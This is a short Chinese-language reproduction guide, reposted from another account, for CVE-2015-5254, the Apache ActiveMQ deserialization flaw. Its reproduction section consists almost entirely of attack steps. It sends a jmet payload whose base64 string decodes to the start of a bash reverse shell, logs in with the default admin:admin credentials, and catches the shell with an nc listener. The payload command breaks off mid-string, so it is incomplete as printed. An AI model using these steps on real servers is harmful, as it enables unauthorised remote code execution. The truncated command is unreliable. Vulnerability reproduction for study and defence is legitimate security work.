本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。
ApacheActive MQ5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java消息服务(JMS) ObjectMessage对象,利用该漏洞执行任意代码。
0x03 漏洞复现
漏洞版本:
- Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0
1.使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y \"bash -c {echo,YmFzaCAtaSA+JiAv
2. 通过admin:admin弱口令进入管理端
Queues → eventjia → 点击Message ID下的队列消息即可
3. nc监听得到一个shell
nc.exe -lvvp 7777
THE END
暂无评论内容